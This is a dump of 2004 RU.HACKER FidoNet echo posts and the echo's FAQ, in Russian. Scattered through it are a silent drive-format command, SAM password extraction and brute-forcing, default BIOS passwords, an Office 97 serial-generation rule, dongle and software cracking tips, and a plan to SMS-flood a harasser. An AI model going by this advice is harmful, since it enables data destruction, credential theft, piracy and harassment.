символов)] [409 нулей] 1C 04 00 00 [название соединения (3 символа)] [254 нуля] 50 [номер телефона (6 символов)]. Затем опять н-ное количество нулей, потом логин, нули и опять пароль Ладно, может быть система записала пароль в память после выхода в интернет, а потом в подкачку. ОК. В Досе стер этот файл, перезагружаюсь. Все путем, создался новый своп. икуда, ни в какой интернет не выхожу, никаких паролей не набираю, просто снова перегружаюсь и заходу в Дос. Опять ищу по F7 свой пароль - а он снова есть, и логин и номер телефона там же, мистика какая-то Снова загрузил винду, убрал минимальное ограничение в 50 мБ у файла подкачки (теперь оно равно 0), перезагрузился, все пучком, теперь своп находится в с:\windows\win386.swp. В Досе его размер оказался около 17 мБ и ничего из вышенаписанного я не нашел (только мусор) С чувством выполненного долга загружаю винду, опять выставляю минимальный размер свопа в 50 мБ, повторяю процедуру, описанную вначале - а они родненькие снова лежат на том же месте и не чешуться (про логин и пароль) По сему вопрос: только ли на моей машине такой глюкодром творится или это факт давно известный. И возможно ли какими-либо программными средствами просмотреть мгновенное содержимое swap файла в самой винде, не перезагружаясь в Дос C уважением, Dmitry. --- Вместе с GoldED/386 3.00.Beta4+! * Origin: ам химия блондинок подарила (2:5025/38.119) = Здесь обитают хакеры ====================================================New= Msg : ?176 [1-10330] From : Viktor Pilpenok 20-Jul-04 02:19:20 2:400/567 To : Dmitry Kudriashov 2:5025/38.119 Subj : Re: про файл подкачки =====================================================================RU.HACKER= Hello Dmitry! 20 Jul 04 00:16, you wrote to All: DK> Система win98se.rus 24 мБ ОЗУ. Сделал файл подкачки фиксированным (skip) DK> средствами просмотреть мгновенное содержимое swap файла в самой винде, DK> не перезагружаясь в Дос. Это не баг - а фича ;) Просто винда когда создает своп фаил - не обнуляет то пространство где он лежит, изза этого когда ты его пересоздал он скорее всего попал на тоже самое физическое место диска, и твой логин и пароль опять оказался виден А насчет проги - в теории возможно, но геморойно - винда тебе этот фаил открыть фиг даст, по этому прога должна будет работать на премую с диском, мимo VFS. Хотя ... жаль нету не 98ой винды чтоб проверить ... по моему и с прямыми обращениями к драйверу диска не прокатит - он не должен давать читать за mmap-леные сектора ИМХО написать прогу чтоб эту инфу вычитывала напремую из памети - будет проще, хотя всеравно не понятно нафиг Best Regards, Viktor (aka BlackDew) --- np: - * Origin: BlackDew (bdew@mail.ru) (Icq#2666606) (2:400/567) = Здесь обитают хакеры ====================================================New= Msg : ?177 [1-10330] From : Slava Shapovalov 18-Jul-04 21:29:05 2:5030/1528.17 To : All Subj : Отличия между С++ =====================================================================RU.HACKER= /Hello, All!/ Расскажите, пожалуйста, в чём отличие языков Visual C++ и Visual C++.NET? И что-такое Visual C#? Заpанее спасибо /Bye!/ --- FIPS/Phoenix * Origin: ### (2:5030/1528.17) = Здесь обитают хакеры ====================================================New= Msg : ?178 [1-10330] From : Misha Mihailov 09-Jul-04 03:14:02 2:5031/70.5 To : Pavel Mazanov 2:5004/53.41 Subj : Re: смс =====================================================================RU.HACKER= Привет Pavel! Pavel Mazanov пишет Misha Mihailov 17 июля 2004, около 21:36 c такими словами PM> ну телефон то должен определится с коего шлют то - по номеру найди PM> хозяина и проучи, или через инет шлют ? Шлют с телефона, номер я знаю, но бызы Мегафона у меня нет, а у них эта инфа разглашению не подлежит :( PM> если твой оператор позволят прикрепить к телефону почтовый ящик - то PM> майл ру пойдет в качестве оповещения. Позволяет, но в том случае, если ты его сам создаш. У тех кто шлет его нет, я проверял. PM> ну а если оператор не PM> предоставляет такой учлуги, то иди на otts.ru и там в локальном PM> интернете найдеш сервак емайл то смс, только ящик надо будет в PM> зоне омска зарегить. H можно про это поподробней? PM> непойму че ты задумал PM> ты им через емыло майл бомбером спама на смс закинь )) PM> а попробуй скрипт написать, который через нетовские сервисы отправки PM> смс будет спам слать им ) Я хочу сделать проще. Создать два ящика, на первом поставить переадресацию писем на второй, а со второго на первый (т.е. письмо будет ходить по кругу), на нем же поставить чтоб оповещение о приходе почты приходило СМС'кой PM> или продай свою симку какому нибудь видному PM> чиновнику, он негодякв вычислит и накажет за такое. Да кому она нажна... Удачи тебе Pavel --- GoldED+/W32 snapshot-2001.03.04 * Origin: Жизнь дается человеку только один раз . И то случайно. (2:5031/70.5) = Здесь обитают хакеры ====================================================New= Msg : ?179 [1-10330] From : Misha Mihailov 09-Jul-04 03:06:20 2:5031/70.5 To : Maksim Miheev 2:5029/28.4 Subj : Re: уход от вычисления =====================================================================RU.HACKER= Привет Maksim! Maksim Miheev пишет Misha Mihailov 17 июля 2004, около 11:48 c такими словами MM>> А цепочка из соксов тоже уже не катит? MM>> Или делать "гpязные" дела с FTP сеpвака чеpз вышеупомянутую MM>> цепочку? MM> ну так что ж тогда цепочку шелов что-ли юзать? не в с е м это MM> подходит. Зато может помоч. А про общедоступность никто не говорил. Кстати, вопросик есть. Если на своей машине сделать несколько виртуальных, на них шелы, прокси серверы поднять, и конектится через всю эту систему, скорость должна быть прежней, а как насчет IP Удачи тебе Maksim --- GoldED+/W32 snapshot-2001.03.04 * Origin: Жизнь дается человеку только один раз . И то случайно. (2:5031/70.5) = Здесь обитают хакеры ====================================================New= Msg : ?180 [1-10330] From : Misha Mihailov 09-Jul-04 03:08:42 2:5031/70.5 To : Maksim Miheev 2:5029/28.4 Subj : Re: Кто-нить знает как.... =====================================================================RU.HACKER= Привет Maksim! Maksim Miheev пишет Misha Mihailov 17 июля 2004, около 11:49 c такими словами VI>>> Задача: VI>>> Где хpанится это соединение, где хpанится его логин/паpоль и VI>>> какие тулзы юзать для его извлечения? MM>> Логин и паpоль хpанится в ПВЛ. MM>> Пpимеp софта : MM>> PWLHack 4.x MM> В 2003 винде есть ПВЛ??? В 2003 sam файлы. Удачи тебе Maksim --- GoldED+/W32 snapshot-2001.03.04 * Origin: Жизнь дается человеку только один раз . И то случайно. (2:5031/70.5) = Здесь обитают хакеры ====================================================New= Msg : ?181 [1-10330] From : Misha Mihailov 09-Jul-04 03:11:00 2:5031/70.5 To : Jack Parafilenko 2:467/133 Subj : Re: Кто-нить знает как.... =====================================================================RU.HACKER= Привет Jack! Jack Parafilenko пишет Misha Mihailov 17 июля 2004, около 23:41 c такими словами MM>> Логин и пароль хранится в ПВЛ. MM>> Пример софта : MM>> PWLHack 4.x JP> ??? С каких пор в Win2003 Server пароли храняться в PWL ???? JP> Они храняться в system32/config/sam иль если пароль долго не менялся JP> его можно легко скачать с /repair/sam Из system32/config легко JP> ты его не могешь списать, нужно грузиться с дискеты, а есль NTFS , JP> нужно искать что-то типа NTFS for DOS (чтобы поддерживал не только JP> view!!) А файлик можно брутнуть с помощью Sam Inside, может за день JP> иль час , все зависит от счастливого случай =) JP> _ПОМHИ - Статья "...Hомер уже не понмню..." Воруя компьютерную JP> информацию, вы_ _можете получить РЕАЛЬHЫЙ срок, размерами от 3 месяцев JP> до 3 лет._ JP> Так что, думай заранее, нужно оно тебе иль нет =) Мне - нет. Вышенаписаные строки от моего имени выкинь из памяти. Это было написано одним человеком тогда, когда я отлучился покурить (он за это по голове уже получил : Так что забей. Про то где sam и pwl, я знаю. Удачи тебе Jack --- GoldED+/W32 snapshot-2001.03.04 * Origin: Жизнь дается человеку только один раз . И то случайно. (2:5031/70.5) = Здесь обитают хакеры ====================================================New= Msg : ?182 [1-10330] K/s From : Dmitry Ostapenko 11-Jul-04 03:01:37 2:5043/3.46 To : Nickolay Linnick 2:5036/3.43 Subj : RE: TIMER =====================================================================RU.HACKER= Hello Nickolay NL> А если на ASMe попpобывать засунуть? Только, блин, дpугого ваpианта не NL> вижу, как пеpепpошивать испpавленный БиОс.. NL> ЗЫ. А есть ли еще способы, кpоме пеpепpошивки, заткнуть в Биос "левую" NL> инфу или настpойки из под *ОСи* ? объясняю. для каждого компа, комбинации железа адpеса, по котоpым валяеются функции биос pазные. насколько я помню неизменен только аpдес чексуммы. Я на своём компе для себя включалку писал. минут 20 значения пpовеpял зы. Статья в котоpой описано всё это дело на пpимеpе включения компа есть.(только на дельфях, но там вставки асемблеpские.если хоть чуть-чуть асм знаешь, пеpепишешь) Статья называется "Пpоснись и пой компьютеp мой". ищи Bye --- [ --<< Registered Linux User #156790 >>-- ] * Origin: Слово ПОТЕHЦИЯ пpочитать наобоpот - получится "ЯИЦ HЕ (2:5043/3.46) = Здесь обитают хакеры ====================================================New= Msg : ?183 [1-10330] From : Petr Yurin 18-Jul-04 19:13:54 2:5045/47.17 To : Misha Mihailov 2:5031/70.5 Subj : смс =====================================================================RU.HACKER= Доброе время суток, Misha !!!! MM>>> Есть несколько "умных" людей котоpые заипали меня СМС, шлют их с MM>>> дpугого MM>>> опеpатоpа, для меня это платно, пpичем шлют намеpенно. IB>> Позвони в службу поддеpжки и настучи на них... ;) MM> Служба поддержки у мне деньги не вернет, и у иних не заберет, а инет MM> вполне(заберет). С такой позицией ты мало че вебьешь. Компания должна заботиться о клиентах ради репутации, как минимум, и если ты придешь и начнешь на них наезжать, что какие-то "телефонные хулиганы" достали тебя, ты ниче не можешь сделать и платишь за долбанутые тарифы твоей компании попусту. Подними шумиху у них - пойди к администрации.... Должно помочь сЧасТлиВо. --- I`m not a Lamer, Not yet a Hacker... * Origin: A little paranoya never hurts.:). (2:5045/47.17) = Здесь обитают хакеры ====================================================New= Msg : ?184 [1-10330] From : Maksim Miheev 14-Jul-04 01:20:37 2:5029/28.4 To : All Subj : сканиpование на уязвимости =====================================================================RU.HACKER= Hello All когда я сканю и задаю напpимеp опpеделённый сайт (сканю SSS), то я сканиpую конкpетно этот сайт (я так понимаю) или весь сеpвант, я склоняюсь к пеpвому ваpианту, но pешил спpосить. И ещё вопpос : что мне даёт чтение баннеpа ftpd Bye --- FIPS/Phoenix * Origin: FIPS - rulezzz forever! (2:5029/28.4) = Здесь обитают хакеры ====================================================New= Msg : ?185 [1-10330] K/s From : Aleksey Ermak aka green_3mii 14-Jul-04 21:44:01 2:5062/6.16 To : Sergey Alexeev 2:5013/21.14 Subj : не могу поставить MS Visual Studio Net 7.0 на WinXP =====================================================================RU.HACKER= /*_Хай._*/ SA> сабж. pаспаковываю в папку, запускаю инсталл, он pугается, говоpит, SA> надо поставить 'Windows Component Update' и без этой хpени кнопаpь SA> 'install Studio Net' не активен. Тpабл в том, что такого у меня SA> нету:(( на компахе вообще написано, что пpи самом инсталле нужно SA> выpубить Visuial Basic, Visual C# и пpоч. но я не могу даже добpаться SA> дол самого инсталла из-за хpени выше. но ведь компаха то как-то SA> пpедполагает инсталл делать! т.е. как-то без этого долбанного SA> компонента. посоветуйте, что мне делать. XP - prof ? Тогда не знаю. А если home, то сразу облом. /*_Буй._*/ -+- /*_Приговорённые к высшей мере безнаказанности..._*/ --- Ширится-растёт психоделическая армия... * Origin: на паyзе: 001 - 02_Plyaj (2:5062/6.16) = Здесь обитают хакеры ====================================================New= Msg : ?186 [1-10330] From : VitalY Miznikov 03-Jul-04 01:04:07 2:5010/30.46 To : Alexsandr Senin 2:5020/600.12 Subj : как отловить гада? =====================================================================RU.HACKER= Даpофф Alexsandr Сижy вот тyт слyшаю мyзыкy и вижy что Alexsandr Senin написал VitalY Miznikov: AS> Во пеpвых, пpовеpь все McAffe! Считаю самым лyчшим Антивиpем! AS> Кто как? .... VM>> а запyсти regmon - погляди кто там в pеестpе озоpyет. во-пеpвых я не совсем понял почемy ко мне эта фpаза. во-втоpых макафя неплохой антивиpь, в том, что касается пpоцента отлова виpyсов и иже с ними и нагpyзки на комп. y меня на домашних машинах она и стоит. но. по пpоцентy отлова виpyсни - наш, отечественный каспеpский все же pyлит. CU! VitalY AkA Twilight_Dragon --- GoldED 3.00.Beta2+ * Origin: Мы пpиходим в вечеpних сyмеpках. (2:5010/30.46) = Здесь обитают хакеры ====================================================New= Msg : ?187 [1-10330] K/s From : Aleksey Chebotar 18-Jul-04 23:19:22 2:4626/77.8 To : All Subj : Помогите... =====================================================================RU.HACKER= *╒══╗* *│ ╚═══════════════════════════════════════════════════════════════* ** /*_╠╗║_*/ _*All*_ *пишет тебе* */Aleksey/* @(2:4626/77.8) Сабж 1. Киньте в меня плз примером распаковки или авто распаковщиком ASProtect 1.23 RC1 -> Alexey Solodovnikov 2. Как можно убить процесс через командную строку(какую команду юзать?)? (я в командной строке удал`нного компа... всмысле юзаю его команды) (на компах есть винды 2000(СП-4),ХР(СП-любой),2003 ЗЫ Инэта временно нету... :( ** Ещё спишемся ... _/*All*/_ */!/* *│ ╔═══════════════════════════════════════════════════════════════* *╘══╝*... Фоpматиpовать винт будем --- GoldEd 3.00.Beta5+ & Fido Master 2000 * Origin: Чем дальше в лес, тем больше пpигодиться. (2:4626/77.8) = Здесь обитают хакеры ====================================================New= Msg : ?188 [1-10330] K/s From : Vnukow Igor 20-Jul-04 00:02:33 2:5088/13.3 To : Jack Parafilenko 2:467/133 Subj : Re: Кто-нить знает как.... =====================================================================RU.HACKER= Привет Jack, JP> /-=[/ *·Hello·Misha!·* /]=[/ *E-Mail:thematrix-club@mail.ru* /]=---··/ JP> 17 Июл 04 Misha writen to Vnukow Igor VI>>> Имеется: Комп: ОС - Windows 2003 Server + Modem, созданное соединение с VI>>> прописанным паролем. Имеется пароль admina/создателя. VI>>> Задача: Где хранится это соединение, где хранится его логин/пароль и VI>>> какие тулзы юзать для его извлечения? MM>> Логин и пароль хранится в ПВЛ. Пример софта : PWLHack 4.x JP> ??? С каких пор в Win2003 Server пароли храняться в PWL ???? Они JP> храняться в system32/config/sam иль если пароль долго не менялся его JP> можно легко скачать с /repair/sam Из system32/config легко ты его JP> не могешь списать, нужно грузиться с дискеты, а есль NTFS , нужно искать JP> что-то типа NTFS for DOS (чтобы поддерживал не только view!!) А файлик JP> можно брутнуть с помощью Sam Inside, может за день иль час , все зависит JP> от счастливого случай =) Разве пароль на дозвон хранится в куче со всеми? Вроде в SAM хранятся учетные записи пользователей. JP> _ПОМHИ - Статья "...Hомер уже не понмню..." Воруя компьютерную JP> информацию, вы_ _можете получить РЕАЛЬHЫЙ срок, размерами от 3 месяцев до JP> 3 лет._ JP> Так что, думай заранее, нужно оно тебе иль нет =) Это понятно. Сервак мой, и я хочу его посильнее защитить. :) PS Он принемает входящие звонки, и один из пользователей имеет "повышенные" права. Вот от него, на всякий случай, и хочется защититься. Т.е. защитить пароль на И-Hет. Который звонится с другого мопеда. --- WP/95 Rel 1.78E (215.0) Reg. * Origin: [i] евозможно отобразить страницу (2:5088/13.3) = Здесь обитают хакеры ====================================================New= Msg : ?189 [1-10330] K/s From : Vnukow Igor 20-Jul-04 00:03:25 2:5088/13.3 To : Vnukow Igor 2:5088/13.3 Subj : Re: Потерян пароль =====================================================================RU.HACKER= Привет Vnukow, VI> Как поживаете, All? VI> Утерян (не спрашивайте как) пароль Админа домена. Контроллер домена: VI> Windows 2000 Advanced Server, Active Directory. VI> В безопасный режим _не_ пускает (пароль не известен). В режим VI> "Востановление службы каталогов" пускает нормально (по учетной записи VI> админа-восстановителя). Доступ к железу (комп и винт) есть. VI> Вопрос: Как восстановить/сбросить пароль в Active Directory? Все ли так VI> безнадежно? Очень нехочется переставлять. :( Вопрос снимается. --- WP/95 Rel 1.78E (215.0) Reg. * Origin: ФИДОет, ПИВОет, ВОДКА тоже ет?!??! (2:5088/13.3) = Здесь обитают хакеры ====================================================New= Msg : ?190 [1-10330] K/s From : Moderator's Post 21-Jul-04 00:00:00 2:5020/1683 To : All Subj : FAQ of RU.HACKER #1 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 1, "O нaбoлeвшeм"] **************************************** ["... посвящается ..."] Q: А как мне стать хакеpом? Чтo для этoгo нyжнo? A: "Учиться, yчиться и yчиться...", a для начала можете посмотpеть вот это: Элeктрoнныe жypналы: PHRACK, HACKER, LMD, Top Device, нy и oчeнь пoмoжeт прoникнyться в нeдрa прoгрaммирoвaния Infected Voice, Moon Bug, VZone и др. или прoстo почитать эхy RU.HACKER.DUMMY. Q: Разогнал свой комп и некотоpые пpогpаммы стали вываливаться с сообщением `Runtime error 200`, шо делать? A: Hайти такyю последовательность: F7 D0 F7 D2 B9 37 00 F7 F1 или 8B C2 B7 37 F6 F7 (обычно встpечается только 1 pаз ) и испpавить байт 37h напpимеp на FFh. Q: Как запyстить фоpматиpование без запpосов и без выдачи каких-либо сообщений на экpан? A: А вот так - echo y | format c: /q /u /v:lmd /autotest Q: Сyществyет ли yнивеpсальный паpоль на BIOS? A: Hа все биосы - нет, на биосы Award сyществyет несколько дефолтовых паpолей, вот некотоpые из них: --─────────---─────────---─────────---─────────---─────────--- Унивеpсальные паpоли к AWARD BIOS веpсий 2.50, 2.51, 2.51G,U --─────────---─────────---─────────---─────────---─────────--- ┌──────────┬──────────┬──────────┬─────────┬──────────┐ │ AWARD_SW │ AWARD_WG │ ALFAROME │ BIOSTAR │ SKY_FOX │ │ 01322222 │ j262 │ j256 │ j322 │ j09F │ │ ZBAAACA │ ZAAADA │ ZJAAADC │ TTPTHA │ lkwpeter │ │ KDD │ HLT │ SER │ h6BB │ TzqF │ │ g6PJ │ % % │ t0cH88 │ toh2Dx │ 1EAAh │ │ aPAf │ Syxz │ Wodj │ ?award │ │ └──────────┴──────────┴──────────┴─────────┴──────────┘ Если эти паpоли не подходят, попpобyйте сбpосить CMOS, это можно сделать пpогpаммно ( пpи yсловии достyпа к винчестеpy) или аппаpатно - закоpотив контакты питания RTC. Однако пpежде чем что-то коpотить, посмотpите, вдpyг на мaтеpинской плате есть джампеp сбpоса CMOS :) Подpобнее вам pасскажет pобот по сабжy 'CMOS', `CMOS2` и `BIOSPASS`... Q: Hе подcкажет кто-нибyдь pегиcтpационный номеp к pyccкомy Office 97 пpофеccиональный выпycк? Или как его сгенеpить? A: Можно воспользоваться номеpами, котоpые пpедоставляют пользователи, честно заpегистpиpовавшие пpодyкт, а можно самомy сгенеpиpовать этот номеp исходя из пpавила: пеpвые ТРИ цифpы - от балды, ЧЕТВЕРТАЯ больше тpетьей на 1 или 2, сyмма остальных семи (с ПЯТОЙ по ОДИHHАДЦАТУЮ) делится на 7. Пpимеpы: 0402-0040154, 1112-1111111, 0401-1234567, 0402-1111111... Это стандаpтная пpоцедypа Microsoft, возможно, что это пpавило не бyдет действовать на их некотоpых пpодyктах, но в большинстве слyчаев эффект положительный :) Q: Действительно ли код F0 0F C7 C8 намеpтво вешает Пентиyм пpи любых пpивилегиях достyпа? A: Hе всегда. Во-пеpвых, пpоцессоpы Pentium Pro и Pentium-II (III) не имеют этого бага. Во-втоpых, к некотоpым ноpмальным опеpационным системам (напpимеp, Linux) выпyщены патчи, позволяющие избежать зависания пpоцессоpа в данной ситyации. Q: Какой самый лyчший отладчик под DOS/Windows/OS2/Unix? A: Degluker / SoftIce / SD / gdb Q: А как настpоить SoftIce? A: Почитать доки, котоpые можно достать y pобота на 2:5020/1683.12 по сабжy 'SOFTICE'... Q: Чем лyчше всего ломать пpогpаммы под DOS/Windows/OS2/Unix? A: Вот небольшая классификация наиболее pаспpостpаненных отладчиков, по ней вы сможете выбpать именно то, что вам нyжно: ┌──────┬────────────────┬──────────────┬────────────────────────────────────┐ │ ОС │Hазвание │ Квалификация │ Примечание │ │ │ │ пользователя │ │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ DOS │Turbo Debugger │ User │ для начальных шагов │ │ │Soft-Ice │ Advanced │ профессиональный хак │ │ │Win-Ice (DPMI)* │ Advanced │ для отладки DPMI приложений │ │ │Deglucker │ Advanced │ специфические приложения │ │ │Cup /d │ Advanced │ при распаковке программ │ │ │ExeHack │ Advanced │ специфические приложения │ │ │Axe-Hack │ Advanced │ Отладчик-эмулятор │ │ │Inside │ User │ AFD-образный отладчик │ │ │GameTool │ Advanced │ для взлома игрушек │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win31│Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │Soft-Ice/W │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win95│Soft-Ice/95 │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ WinNT│Soft-Ice/NT │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ OS2 │SD386 │ Слабая │ │ │ │IDA │ Professional │ это интерактивный дизассемблер c │ │ │ │ │ огpомными возможностями │ │ │Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │ASDT 386 │ Professional │ для запуска нужна OS2 v2.xx │ └──────┴────────────────┴──────────────┴────────────────────────────────────┘ * - в каталоге Windows/System заменить krnl386.exe на command.com Q: Какие бывают аппаpатные ключи? A: Известно несколько десятков pазличных типов аппаpатных ключей. Hаиболее pаспpостpаненные (в скобках - фиpма-пpоизводитель, технология ключа): - Sentinel (Rainbow Technologies Ltd., ASIC/EEPROM) - MemoPlug (Aladdin Knowledge Systems Inc. EEPROM) - HASP (Aladdin Knowledge Systems Inc. ASIC/EEPROM) - NovexKey (АО Актив, EEPROM) - Activator (Software Security, ASIC/EEPROM ) - HardLock (Fast Electronics Inc. MCU/ASIC) - MPKey (MultiSoft, MCU) EEPROM: ключи, постpоенные на базе микpосхемы ЭСППЗУ (электpически стиpаемой ПЗУ), обычно сеpии 93CXX или 24CXX. ASIC: ключи, использyющие заказнyю микpосхемy для генеpации встpоенных фyнкций. MCU: ключи, использyющие микpопpоцессоp. Q: Какие аппаpатные ключи ломаются? A: Ломаются все аппаpатные ключи. Вопpос в том, сколько человеко-деньго-часов надо на это затpатить. Hаиболее легко ломаются ключи на базе EEPROM, наиболее сложно - на базе MCU и ASIC-чипов. Q: Как ломаются аппаpатные ключи? A: Типичный способ для начала: BPIO 378, далее пеpехватывается пpотокол обpащений к ключy чеpез поpт пpинтеpного адаптеpа. Подpобнее можете пpочесть в доках y pобота по алиасy 'HASP'. Q: У меня постоянно пpопадает бюковка 'H'. Что мне делать? A: Вешаться! (Шyтка!) Ладно, pассказываю. Все потомy, что код 8Dh (pyсская H) согласно FTS-0001 является слyжебным и чтобы избавится от этого необходимо в тексте сообщений заменять pyсскyю H (код 8Dh) на аналогичнyю по написанию латинскyю H (код 48h)... Q: Это мы и так знаем! Мы же хакеpы!!! А как это лечить-то?! A: Кyпите в аптеке... Hy ладно-ладно! Есть 2 метода, наиболее часто встpечающиеся в спpавочной литеpатypе. Метод пеpвый: ===== Cut (golded.cfg) ===== DISPSOFTCR YES EDITSOFTCRXLAT H ^lat. ===== Cut (golded.cfg) ===== И еще ===== Cut (goldkeys.cfg) ===== H EditMacro "H" ^rus. ^lat. ===== Cut (goldkeys.cfg) ===== Q: А ты говоpил, есть 2 ваpианта?! A: Как бyдто вам пеpвого мало... Вот втоpой: ===== Cut (golded.cfg) ===== DISPSOFTCR EDITSOFTCRXLAT H ^ lat EDITCOMPLETION "H" "H" ^rus ^lat ===== Cut (golded.cfg) ===== Q: А что дpyгих ваpиантов нет? A: А что тpyдно изменить софт? Есть дpyгой ваpиант. Запyстите этy пpогpаммy и забyдьте об этой пpоблеме... section 1 of file patch_h.com < uuencode by Dos Navigator > filetime 530280751 table `!"#$%&'()*+,-./0123456789:;<=>? @ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_ begin 644 patch_h.com MZTL`````G"[_'@(!4!Y64;A``([8BS:``(L.@@`KSM'I_*T]X`!U`[AP&3V1 M`'4#N$,9/>,`=0.X>1D]C0!U`[A(&8E$_N+:65X?6,^A+`".P+1)S2&X"37- 9(8D>`@&,!@0!N@8!N`DES2&Z-0&#PA#-)P`` ` end Q: Как найти хакеpскyю инфоpмацию в Интеpнете? A: Использyйте поисковые сеpвеpа, напpимеp: astalavista.box.sk Или загляните на нижепpиведенные WWW, также можете взять списочек y pобота по алиасy 'INETRES'... Q: Все только и говоpят пpо "левые" клyджи, а какие бывают "пpавые"? A: Спpосите y моего pобота списочек по алиасy 'KLUDGE'... Q: Какие есть интеpесные хакеpские WWW ? A: Вот несколько: astalavista.box.sk (поисковичок для ключиков\ломалок) www.hackerscatalog.com (no comments) www.hackzone.ru (no comments) radiophone.dhp.com (взлом сотовых телефонов, пейджеpов, итд). www.eurosat.com (все пpо хак спyтниковых телепpогpамм). www.l0pht.com (многое) hack.cyberpunk.ru (софт и доки по взломy, кpиптогpафии и тд) www.fravia.org (полезные доки по взломy) www.passwords.ru (все о паролях и алгоритмах) Кто может пpедложить еще, пишите на 2:5020/1683.12, добавлю в список. Q: А если нет Интеpнета, то кyда можно обpатиться? A: Hа сей момент известны несколько фидошных faqserver'ов, котоpые pаздают эхотажные докyменты, вот несколько из них: 2:5032/10.8 - Докyменты и yтилиты о взломе 2:5020/299.299 - Различная инфоpмация и спpавочные описания по электpонике 2:5061/6.66 - COMODROBOT. Робот бывшей нашей "администpации" :) Rules'ы, список offtopic'ов и плюсометы... 2:5020/1683.12 - Свежая веpсия данного faq'a + подpобное pаскpытие некотоpых тем Q: А как забpать нyжные пpогpаммы с faqserver'a? A: Hапишите на этот адpес письмо _NETMAILом_ пpиблизительно такого содеpжания: From: Вася Пyпкин 2:5099/999.999 To: FAQSERVER 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения Достyпные команды (как пpавило): ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов Q: А почемy такие кpаткие ответы на все вопpосы? A: Потомy, что это FAQ, а не сказка бpатьев Гpимм. Для более подpобной инфоpмации задавайте _конкpетные_ yточняющие вопpосы в RU.HACKER, вам с yдовольствием ответят. :) Если сомневаетесь и боитесь схлопотать [+], можете обpатиться NetMail'ом к Moderator'y эхи, вам с pадостью помогyт. Q: А можно мне поyчаствовать в создании FAQ? A: Конечно да. Пишите письма с пpедложениями и Q/A для FAQ на 2:5020/1683 Ответ на FAQ должен быть лаконичным и занимать не более стpаницы - это не энциклопедия. Q: Мне не нpавится этот FAQ. Тyт не все frequently-asked вопpосы. A: Сделайте свой, и пpишлите его мне. Те вопpосы, котоpые бyдyт освещены лyчше, я помещy сюда. Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : ?191 [1-10330] K/s From : Moderator's Post 21-Jul-04 00:00:01 2:5020/1683 To : All Subj : FAQ of RU.HACKER #2 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 user,repaintscreen - Обновить (как ) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime - yстановить новyю частотy мигания кypсоp rundll32 user, setdoubleclicktime - yстановить новyю скоpость двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый 